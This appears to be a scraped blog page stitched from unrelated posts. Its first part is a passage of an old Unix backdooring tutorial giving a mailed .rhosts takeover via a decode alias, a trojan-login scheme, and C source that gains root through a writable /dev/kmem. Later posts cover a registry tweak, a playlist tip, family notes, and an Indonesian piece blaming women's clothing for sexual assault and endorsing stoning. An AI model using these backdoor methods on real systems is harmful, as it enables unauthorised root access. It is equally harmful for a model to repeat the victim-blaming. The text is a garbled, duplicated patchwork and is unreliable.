to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by daemon9@netcom.com */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
From The Infinity Concept Issue II
BA regedit
ok m8s,
any of you that do websites and like to open .html and similar files in notepad to edit scrpits, this is THE coolest windows registry edit ever
you can download the zip file with the .reg in it (run it and it automatically adds itself to your registry) or do it manually
CODE
http://www.geocities.com/ichbindeingott5/winXP-Notepad.zip
Manually: regedit and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\Shell
add the key "notepad"
it's default value should be "Open with Notepad"
now, under "notepad", add the key "Command"
it's default value should be (with the quotes) "C:\Windows\System32\Notepad.exe" "%1"
ok, exit regedit and go right click on ANY file...
your new option: Open with Notepad
HOW BADASS IS THAT?!?!?!?
I FOUND THIS ONE ON MY OWN!!!!!!
i know this one works on XP and 2000, you can PROBABLY enter it manually on windows 9x, but i have not tested that
okay okay, i know maybe not everyone cares...but this was fun for me because i love tweaking my computer AND it makes some web design stuff eaiser for me :D
any of you that do websites and like to open .html and similar files in notepad to edit scrpits, this is THE coolest windows registry edit ever
you can download the zip file with the .reg in it (run it and it automatically adds itself to your registry) or do it manually
CODE
http://www.geocities.com/ichbindeingott5/winXP-Notepad.zip
Manually: regedit and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\Shell
add the key "notepad"
it's default value should be "Open with Notepad"
now, under "notepad", add the key "Command"
it's default value should be (with the quotes) "C:\Windows\System32\Notepad.exe" "%1"
ok, exit regedit and go right click on ANY file...
your new option: Open with Notepad
HOW BADASS IS THAT?!?!?!?
I FOUND THIS ONE ON MY OWN!!!!!!
i know this one works on XP and 2000, you can PROBABLY enter it manually on windows 9x, but i have not tested that
okay okay, i know maybe not everyone cares...but this was fun for me because i love tweaking my computer AND it makes some web design stuff eaiser for me :D
Friday, August 5, 2011
coba coba...
well... disini ana lagi coba-coba ada site yang katanya ngasih payment dan syaratnya salah satunya bikin link ini http://mylot.com/hbabd8685
gitulah...
myLot User Profile
gitulah...
myLot User Profile
Monday, August 1, 2011
Small tut for RealMedia
You may find this helpful if you donwload hundreds of short episodes in rm format like me and tired of double-click to open next files.
Very easy. Use notepad to open a new file, type this inside:
file://link to file1
file://link to file2
(type as many as you want)
Close file. Rename it to FileName.rm
Then you`re done!!!!
Ex:
I put my playlist file here: C:\Movies\7VNR
And the movie files are in C:\Movies\7VNR\DragonBall
Then inside my playlist file I`ll have something like this:
file://DragonBall/db134.rm
file://DragonBall/db135.rm
file://DragonBall/db136.rm
file://DragonBall/db137.rm
file://DragonBall/db138.rm
tanduran omah --- part2
kie tanduran sing neng nggon nduwur...
eneng tanduran ku = wit kurmo & wit asem thailand {iseh cilik-cilik umure lagi 2 tahunan kurang}
mugo-mugo ndang cepet gede...
njero omah....
gambar di jikuk esok-esok pas poso pertama romadon 1432H....
motore nggone bapak wes metu sekitar jam papatan kurang - bapak takziyah neng pacitan mangkate kambi umar...
si kunyil2 lagi do turu... Mujib esok mau wes sahur mangan endok jangane opor.
Nailah & Luqman
Cah loro iki lagi do podo dolanan pas aku nemoni tamu, kie tak photo mergo do podo berisik ... delok ae tampang-e kunyil loro kui
pemikiran yang benar disalahkan
Menanggapi berita yang ada di link ini KLIK BERITA SELENGKAPNYA benarlah bila makin hari orang makin tidak berpikir secara jernih....
kalau kita perhatikan ataupun di buat sebuah penelitian saya yakin bahwa cara berpakaian seorang wanita berpengaruh terhadap tingkat kejahatan seksual. karena dengan berpakaian tidak sopan {memperlihatkan bagian-bagian tubuh wanita yang merangsang laki-laki normal} maka tidaklah tidak mungkin apabila para lelaki membayangkan hal-hal yang senonoh dan hal ini bisa membawa lelaki tersebut {apabila nafsu telah menguasai tubuh & pikiran jernihnya} untuk melakukan perbuatan asusila, apalagi ada kesempatan saat itu. misalnya ketika malam hari tidak banyak orang disekitar, atau di dalam apartemen, hotel, dsb.
Saat saya membaca berita di atas saya yakin apabila orang-orang berpendapat bahwa wanita boleh berpakaian seenaknya maka merupakan lahan yang empuk bagi setan dalam melancarkan bisikan-bisikannya kepada manusia untuk melampiaskan nafsu birahinya... mending bila ia sudah beristri... bagaimana kalau tidak?
well... dalam islam sudah ditetapkan hukum-hukum bagi para pezina, pemerkosa dsb. hukuman yang paling keras ialah dirajam hingga mati... hukuman ini sejujurnya sangat ringan bila dibandingkan efek/akibat yang terjadi apabila sang pelaku tindak asusila dibiarkan saja berkeliaran di muka bumi. Bukanlah tidak mungkin apabila ia {setelah keluar dari penjara misalnya} melakukan tindak kejahatan lagi merenggut korban-korban baru yang mana dapat merusak tatanan kehidupan masyarakat yang aman sentosa... well penegakan syariah memang perlu di galakkan demi menggapai kehidupan yang aman dan dibawah ridho Ilahi.
Kembang Opo Iki
Kembang ning nduwur, dipoto pas esok ... jenenge kembang iki aku ra reti... nek panjenengan ngerti jenenge kembang iki mbok kulo di kandani...
Saturday, July 30, 2011
teroris?..,. pembunuh..?
If the person who killed 90+ people in Norway was a Muslim, the Press would have declared him as a terrorist. For now though, he is just an 'Assailant ', 'Attacker' (Reuters), 'Gunman' (BBC, CNN & Al Jazeera). Looks like 'Terrorist ' is a name designated for Muslims? The US Dept of State calls it an 'Act of Violence', Not an 'Act of Terrorism' . Share this status and let the world know. Stop the hypocrisy!
"jika orang yang membunuh 90+ orang di norwegia adalah seorang muslim, media press bakal menyebutnya sebagai teroris. tetapi sekarang, dia hanyalah disebut sebagai "penyerang", "penyerbu" (media Reuters), "pembunuh bersenjata api" (BBC, CNN, & al jazeera). sepertinya istilah "teroris" hanya ditujukan kepada orang muslim. pemerintah Amerika serikat menyebutnya sebagai "tindakan kekerasan", dan bukan "tindakan teroris". ....... hentikan kemunafikan ini!!"
Thursday, July 28, 2011
Subscribe to:
Posts (Atom)